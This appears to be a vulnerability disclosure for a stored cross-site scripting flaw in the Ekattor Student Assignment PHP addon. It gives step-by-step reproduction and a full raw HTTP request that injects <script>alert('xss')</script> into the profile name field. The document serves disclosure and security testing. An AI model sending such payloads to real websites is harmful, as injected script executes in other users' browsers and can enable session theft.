# Exploit Title: Ekattor Student Assignment php script-Stored XSS
# Date:2021-06-4
# Exploit Author: Mostafa Farzaneh - Smiling.Hunter@protonmail.com
# Vendor Homepage: https://codecanyon.net/user/creativeitem
# Software Link: https://codecanyon.net/item/ekattor-student-assignment-addon/30416274
# Tested on: Ubuntu
#How To Produce it :
1-Go to /demo/v7/login
2-Login to your Account(teacher or student or parrent,...)
3-Navigate to My account=>Update profile
4-edite "Name" feild to "<script>alert('xss')</script>"
5-Now, malicious code is executed wherever the user name is ready on the site
POST /demo/v7addon/teacher/profile/update_profile HTTP/1.1
Host: localhost
Content-Length: 651
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysm60AiiVmAB6CmzY
Origin: localhost
Referer: http://localhost/demo/v7addon/teacher/profile
Accept-Encoding: gzip, deflate
Accept-Language: fa-IR,fa;q=0.9,en-US;q=0.8,en-XA;q=0.7,en;q=0.6
Cookie: ci_session=290c7b11d9e9f03c8e7a18b0d471b36741ec98b5
Connection: close
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="name"
Alison <script>alert('xss')</script>
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="email"
teacher@example.com
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="phone"
345020212
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="address"
82 Kuen Suk Shuen Tsuen Hang Hiu Kowloon
------WebKitFormBoundarysm60AiiVmAB6CmzY
Content-Disposition: form-data; name="profile_image"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarysm60AiiVmAB6CmzY--
*********************************************************
#Discovered by: Mostafa Farzaneh
#Telegram: @pyweb_security
*********************************************************